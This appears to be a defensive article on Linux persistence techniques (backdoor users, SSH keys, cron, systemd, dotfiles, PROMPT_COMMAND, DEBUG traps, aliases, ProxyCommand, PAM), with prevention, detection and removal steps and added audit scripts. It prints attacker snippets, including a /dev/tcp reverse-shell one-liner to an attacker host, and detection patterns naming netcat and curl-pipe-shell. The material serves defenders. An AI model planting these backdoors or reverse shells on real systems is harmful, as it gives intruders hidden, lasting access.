Persistence Mechanisms

Persistence is one of the most critical stages in a cyberattack: once an attacker has access, they want to make sure they can come back even if their initial entry point is closed. At Black Hat USA 2025, John Hammond presented several lesser-known Linux persistence techniques that defenders should be aware of.

In this article, I’ll review both common and lesser-known techniques, and, most importantly, how to prevent, detect, and remove them.

Common Persistence Techniques

1. Adding a Backdoor User

adduser attacker
usermod -aG sudo attacker

Prevention

  • Enforce centralized authentication (LDAP, AD, or PAM hardening).

  • Disable direct root login; use only known accounts with key-based auth.

  • Use tools like aide or osquery to monitor system files.

Detection

  • Check /etc/passwd and /etc/shadow for unexpected users.

  • Audit /etc/group for sudo/wheel membership.

  • Use lastlog to spot accounts that suddenly appear.

Removal

  • deluser attacker (or userdel -r attacker).

  • Review /home/attacker for artifacts.
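The checks in the detection list above, as an added example script (not from the original article): it audits /etc/passwd and /etc/group for extra UID 0 accounts, sudo/wheel members and system-range UIDs that have a login shell. Paths are parameters so it runs against a mounted image as well as the live files; the sample files are constructed.

```sh
#!/bin/sh
# Added example, not from the original article: audit passwd/group for the
# backdoor-user pattern above. File paths are parameters so the check can
# run against a mounted image as well as the live /etc/passwd and /etc/group.

# Prints one finding per line:
#   UID0  <name>          an account other than root with UID 0
#   PRIV  <group> <name>  explicit members of sudo/wheel
#   SHELL <name> ...      a system-range UID (<1000) that has a login shell
#                         (service accounts such as postgres are expected hits)
audit_users() {
    passwd="$1"; group="$2"
    awk -F: '$3 == 0 && $1 != "root" { print "UID0 " $1 }' "$passwd"
    awk -F: '($1 == "sudo" || $1 == "wheel") && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print "PRIV " $1 " " m[i]
    }' "$group"
    awk -F: '$3 > 0 && $3 < 1000 && $7 !~ /(nologin|false|sync|halt|shutdown)$/ {
        print "SHELL " $1 " uid=" $3 " shell=" $7 }' "$passwd"
    return 0
}

# Constructed sample files (not a real system): "backdoor" was given UID 0
# and "attacker" was added to the sudo group, as in the commands above.
tmp=$(mktemp -d)
cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
attacker:x:1001:1001::/home/attacker:/bin/bash
backdoor:x:0:0::/root:/bin/bash
svc:x:999:999::/var/lib/svc:/bin/sh
EOF
cat > "$tmp/group" <<'EOF'
root:x:0:
sudo:x:27:alice,attacker
wheel:x:10:
users:x:100:
EOF

audit_users "$tmp/passwd" "$tmp/group"
```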


2. Adding SSH Keys

ssh-copy-id user@<VICTIM_IP>

Prevention

  • Restrict permissions: chmod 600 ~/.ssh/authorized_keys.

  • Use centralized key management.

  • Monitor with auditd for changes to .ssh directories.

Detection

  • Inspect ~/.ssh/authorized_keys for unknown keys.

  • Audit /etc/ssh/sshd_config for unusual settings (AuthorizedKeysCommand).

  • Look for hidden files like /opt/.hiddenkeys.

Removal

  • Remove the malicious key line from authorized_keys.

  • Restart SSH if system-wide config was modified.
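An added example (not from the original article) of the two detection steps above: every key in authorized_keys is compared against an allowlist of approved public keys, and sshd_config is searched for directives that change where keys come from or relax authentication. OpenSSH file formats are assumed; the key blobs and config are constructed placeholders.

```sh
#!/bin/sh
# Added example, not from the original article: check an authorized_keys
# file against an allowlist of approved public keys and list the
# sshd_config directives that change where or how keys are accepted.
# Assumes OpenSSH formats; paths are parameters so it also works on a
# mounted image. The key blobs below are constructed placeholders.
# For each key line: "UNKNOWN <comment-or-blob>" when the key blob is not in
# the allowlist, and "OPTIONS <line>" when the entry carries key options
# (command=, from=, ...), which deserve a look even for approved keys.
audit_authorized_keys() {
    keys="$1"; allow="$2"
    awk -v allow="$allow" '
        BEGIN { while ((getline l < allow) > 0) { split(l, f, " "); ok[f[2]] = 1 } }
        /^[[:space:]]*(#|$)/ { next }
        {
            # Plain entries start with the key type; otherwise field 1 is options
            # (this simple split assumes no spaces inside quoted options).
            if ($1 ~ /^(ssh-|ecdsa-|sk-)/) { blob = $2; cmt = $3 }
            else { blob = $3; cmt = $4; print "OPTIONS " $0 }
            if (!(blob in ok)) print "UNKNOWN " (cmt == "" ? blob : cmt)
        }' "$keys"
    return 0
}
# Directives that redirect key lookup or weaken authentication (keywords are
# case-insensitive in sshd_config, hence -i).
audit_sshd_config() {
    grep -niE '^[[:space:]]*(AuthorizedKeysCommand|AuthorizedKeysFile|PermitRootLogin|PasswordAuthentication|PermitEmptyPasswords)' "$1" || true
    return 0
}
# Constructed sample data (not real keys or a real host).
tmp=$(mktemp -d)
cat > "$tmp/allowlist" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEALICEKEY alice@laptop
EOF
cat > "$tmp/authorized_keys" <<'EOF'
# approved
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEALICEKEY alice@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABEXAMPLEUNKNOWNKEY unknown-host
no-pty,from="10.0.0.0/8" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEALICEKEY alice@backup
EOF
cat > "$tmp/sshd_config" <<'EOF'
Port 22
PermitRootLogin no
AuthorizedKeysCommand /opt/.hiddenkeys/lookup.sh
AuthorizedKeysCommandUser nobody
EOF
audit_authorized_keys "$tmp/authorized_keys" "$tmp/allowlist"
audit_sshd_config "$tmp/sshd_config"
```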


3. Cron Jobs

echo "<frequency> backdoor_script" | crontab -

Prevention

  • Restrict cron usage to trusted users (/etc/cron.allow, /etc/cron.deny).

  • Monitor changes with auditd.

Detection

  • Run crontab -l for each user.

  • Inspect /etc/crontab, /etc/cron.*.

  • Use systemctl list-timers.

Removal

  • Delete the malicious entry.

  • Kill any still-running process started by it.


4. Systemd Services

Malicious .service files:

[Service]
ExecStart=/usr/bin/<backdoor>

Prevention

  • Restrict sudo usage; don’t allow untrusted users to modify /etc/systemd/.

  • Use tripwire/aide to monitor changes.

Detection

  • systemctl list-unit-files | grep enabled.

  • Look for strange files in /etc/systemd/system/.

  • Check logs: journalctl -u <service>.

Removal

systemctl disable <malicious>.service
systemctl stop <malicious>.service
rm /etc/systemd/system/<malicious>.service
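An added example (not from the original article) for the "look for strange files in /etc/systemd/system/" step: it reads every .service file in a directory and flags ExecStart targets in locations a packaged service never uses, or that do not exist on disk. The directory is a parameter and the sample units are constructed.

```sh
#!/bin/sh
# Added example, not from the original article: review the .service files in
# a unit directory and flag ExecStart targets that no packaged service would
# use. The directory is a parameter; on a live host point it at
# /etc/systemd/system (and ~/.config/systemd/user for per-user units) and
# pair the result with "dpkg -S" / "rpm -qf" to confirm the binary is package-owned.

# Prints "SUSPECT <unit> <path>" for ExecStart/ExecStartPre/ExecStartPost
# binaries under /tmp, /var/tmp, /dev/shm, /home or any hidden directory,
# and "MISSING <unit> <path>" when the binary is not on disk at all.
scan_units() {
    dir="$1"
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        name=$(basename "$unit")
        # Take the command path after "=", dropping systemd's -/@/+/!/: prefixes.
        grep -E '^[[:space:]]*ExecStart(Pre|Post)?=' "$unit" |
        sed -E 's/^[^=]*=[-@+!:]*//' |
        awk '{ print $1 }' |
        while read -r bin; do
            case "$bin" in
                /tmp/*|/var/tmp/*|/dev/shm/*|/home/*|*/.*) echo "SUSPECT $name $bin" ;;
                *) [ -e "$bin" ] || echo "MISSING $name $bin" ;;
            esac
        done
    done
    return 0
}

# Constructed sample units (not from a real host).
tmp=$(mktemp -d)
mkdir "$tmp/units"
printf '[Service]\nExecStart=/bin/sh -c "sleep 1"\n' > "$tmp/units/good.service"
printf '[Service]\nExecStart=/dev/shm/.x/agent --daemon\n' > "$tmp/units/backdoor.service"
printf '[Service]\nExecStart=-/usr/sbin/not-installed-daemon\n' > "$tmp/units/stale.service"
printf '[Service]\nExecStartPre=/home/attacker/.local/bin/run\nExecStart=/bin/sh\n' > "$tmp/units/updater.service"

scan_units "$tmp/units"
```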

5. RC Files (.bashrc, .profile, etc.)

Malicious lines in shell startup files:

bash -i >& /dev/tcp/<attacker>/4444 0>&1

Prevention

  • Apply least privilege: restrict who can write to home directories and their startup files.

  • Use restricted shells where possible.

Detection

  • Inspect hidden dotfiles in /home/*.

  • Look for suspicious commands (netcat, bash -i, curl | sh).

  • Use integrity monitoring.

Removal

  • Remove injected lines.

  • Rebuild affected dotfiles if unsure.


Lesser-Known Persistence Techniques

6. Environment Variables

export PROMPT_COMMAND="<backdoor> &"

Prevention

  • Restrict write access to environment configs.

  • Audit environment variables, and the files that set them, on a regular basis.

Detection

  • Run printenv and look for unusual variables.

  • Audit /etc/environment and /etc/profile.d/.

Removal

  • unset PROMPT_COMMAND.

  • Clean .bashrc, .profile, /etc/profile.d/.


7. Trap Debug Hijack

trap "<backdoor> &" DEBUG

Prevention

  • Lock down dotfiles.

  • Monitor for shell modifications.

Detection

  • Inspect ~/.bashrc for trap commands.

  • Run trap -p to list active traps.

Removal

trap - DEBUG

Then clean startup files.


8. Aliases

alias ls="backdoor & ls --color=auto"

Prevention

  • Enforce minimal shell profiles.

  • Use integrity monitoring.

Detection

  • Run alias to list defined aliases.

  • Inspect ~/.bashrc, ~/.zshrc, /etc/bash.bashrc.

Removal

unalias ls

Remove alias definitions from dotfiles.

Search the shell configuration locations for remaining definitions (scoped to those paths rather than the whole filesystem, which would also walk /proc and take a very long time):

grep -rn "alias " /etc/bash.bashrc /etc/profile /etc/profile.d /etc/zsh /home /root 2>/dev/null

9. SSH Config Abuse

Host *
  ProxyCommand <backdoor> %h %p

Prevention

  • Enforce strict permissions (chmod 600) on SSH config files.

  • Monitor for hidden files in /opt/, /etc/ssh/.

Detection

  • Inspect ~/.ssh/config and /etc/ssh/ssh_config.

  • Look for ProxyCommand or unexpected AuthorizedKeysCommand.

Removal

  • Clean suspicious config directives.

  • Restart SSH.
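One scan that covers the detection steps of sections 5 to 9 (reverse-shell one-liners in RC files, PROMPT_COMMAND, DEBUG traps, aliases that chain a second command, ProxyCommand in SSH client configs), as an added example that is not part of the original article. It assumes bash/zsh-style dotfiles; the root directory is a parameter so it can cover a mounted image, /home, or a single user, and the sample tree is constructed from the snippets shown in those sections.

```sh
#!/bin/sh
# Added example, not from the original article: one scan over shell startup
# files and SSH client configs for the patterns in sections 5 to 9 (reverse
# shell one-liners, PROMPT_COMMAND, DEBUG traps, aliases that chain a second
# command, ProxyCommand). Assumes bash/zsh-style dotfiles; the root directory
# is a parameter so it can cover a mounted image, /home, or a single user.

# Prints "<TAG> <file>:<line>:<text>" per hit; every hit is a lead to review,
# not proof of compromise (ProxyCommand and aliases with ';' have legitimate uses).
scan_dotfiles() {
    root="$1"
    find "$root" -type f \( -name '.bashrc' -o -name '.bash_profile' -o -name '.profile' \
        -o -name '.zshrc' -o -name 'bash.bashrc' -o -name 'profile' -o -name 'zshrc' \
        -o -path '*/.ssh/config' -o -path '*/ssh/ssh_config' -o -path '*/profile.d/*' \) \
        2>/dev/null | LC_ALL=C sort | while read -r f; do
        grep -nE '/dev/(tcp|udp)/|bash -i|(^|[^[:alnum:]_])(nc|netcat)([^[:alnum:]_]|$)|(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh' "$f" | sed "s|^|SHELL $f:|"
        grep -nE '^[[:space:]]*(export[[:space:]]+)?PROMPT_COMMAND=' "$f" | sed "s|^|PROMPT $f:|"
        grep -nE '^[[:space:]]*trap[[:space:]].*DEBUG' "$f" | sed "s|^|TRAP $f:|"
        grep -nE '^[[:space:]]*alias[[:space:]].*[&;]' "$f" | sed "s|^|ALIAS $f:|"
        grep -nE '^[[:space:]]*ProxyCommand' "$f" | sed "s|^|PROXY $f:|"
    done
    return 0
}

# Constructed sample tree (not a real host): alice is clean, bob carries the
# four dotfile techniques above plus a ProxyCommand hook in ~/.ssh/config.
tmp=$(mktemp -d)
mkdir -p "$tmp/home/alice" "$tmp/home/bob/.ssh" "$tmp/etc/profile.d"
printf 'alias ll="ls -alF"\nexport PATH="$HOME/bin:$PATH"\n' > "$tmp/home/alice/.bashrc"
cat > "$tmp/home/bob/.bashrc" <<'EOF'
alias ls="backdoor & ls --color=auto"
export PROMPT_COMMAND="backdoor &"
trap "backdoor &" DEBUG
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
EOF
printf 'Host *\n  ProxyCommand backdoor %%h %%p\n' > "$tmp/home/bob/.ssh/config"
printf 'export EDITOR=vim\n' > "$tmp/etc/profile.d/editor.sh"

scan_dotfiles "$tmp"
```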


10. PAM Degradation

Attackers may patch or replace PAM modules for stealth persistence.

Prevention

  • Only install signed packages.

  • Enable kernel integrity measurement and appraisal (IMA/EVM) so that modified modules and libraries are detected.

  • Monitor with osquery.

Detection

  • Verify PAM configs: /etc/pam.d/*.

  • Check the integrity of the modules in /lib/security/ (on many distributions the directory is /lib/x86_64-linux-gnu/security/ or /usr/lib64/security/).

  • Use ldd on PAM-linked binaries (login, sshd, su) to list the shared objects they actually load and spot replaced ones.

Removal

  • Restore PAM configs from backup.

  • Reinstall libpam packages.
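An added example (not from the original article) of the integrity check above: a sha256 baseline of /etc/pam.d and the PAM module directory taken on a known-good host, then verified later to list modified, missing and added files. This is the same comparison aide performs and that dpkg -V / rpm -V perform against vendor hashes on package-managed systems. sha256sum is assumed, paths are parameters because the module directory differs between distributions, and the sample tree is constructed.

```sh
#!/bin/sh
# Added example, not from the original article: take a sha256 baseline of the
# PAM configuration and module directory on a known-good host and verify a
# host against it later (the same comparison aide does, and that "dpkg -V
# libpam-modules" / "rpm -V pam" do against vendor hashes). Assumes sha256sum;
# every path is a parameter because the module directory varies by distribution.

# Writes "<sha256>  <path>" for every regular file under the given directories.
pam_baseline() {
    find "$@" -type f -exec sha256sum {} + 2>/dev/null
}

# Compares the directories with a saved baseline and prints one line per
# difference: MODIFIED (hash changed), MISSING (in baseline, gone now),
# ADDED (new file, e.g. an extra pam_*.so). Paths are assumed to have no spaces.
pam_verify() {
    baseline="$1"; shift
    pam_baseline "$@" > "$baseline.now"
    awk 'NR == FNR { base[$2] = $1; next }
         { now[$2] = $1 }
         END {
             for (f in base) if (!(f in now)) print "MISSING " f
             for (f in now)  if (!(f in base)) print "ADDED " f
                             else if (base[f] != now[f]) print "MODIFIED " f
         }' "$baseline" "$baseline.now" | LC_ALL=C sort
    rm -f "$baseline.now"
    return 0
}

# Constructed sample tree standing in for /etc/pam.d and the module directory
# (placeholder contents, not real modules).
tmp=$(mktemp -d)
mkdir -p "$tmp/pam.d" "$tmp/security"
printf 'auth required pam_unix.so\n' > "$tmp/pam.d/common-auth"
printf 'auth include common-auth\n' > "$tmp/pam.d/sshd"
printf 'module:pam_unix v1\n' > "$tmp/security/pam_unix.so"
printf 'module:pam_env v1\n' > "$tmp/security/pam_env.so"
pam_baseline "$tmp/pam.d" "$tmp/security" > "$tmp/baseline.sha256"

# Simulate tampering after the baseline: edited config, replaced module,
# removed module, extra module dropped in.
printf '# edited\nauth required pam_unix.so\n' > "$tmp/pam.d/common-auth"
printf 'module:pam_unix v1 patched\n' > "$tmp/security/pam_unix.so"
rm "$tmp/security/pam_env.so"
printf 'module:pam_extra\n' > "$tmp/security/pam_extra.so"

pam_verify "$tmp/baseline.sha256" "$tmp/pam.d" "$tmp/security"
```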


Conclusion

Persistence mechanisms range from blatant (extra users, cron jobs) to subtle (aliases, PAM tampering). The key for defenders is:

  • Prevent: enforce least privilege, configuration management and root access protection.

  • Detect: monitor system integrity (osquery, aide, auditd).

  • Remove: restore from clean backups, audit thoroughly.

Awareness is the first step because persistence is only effective if it goes unnoticed.
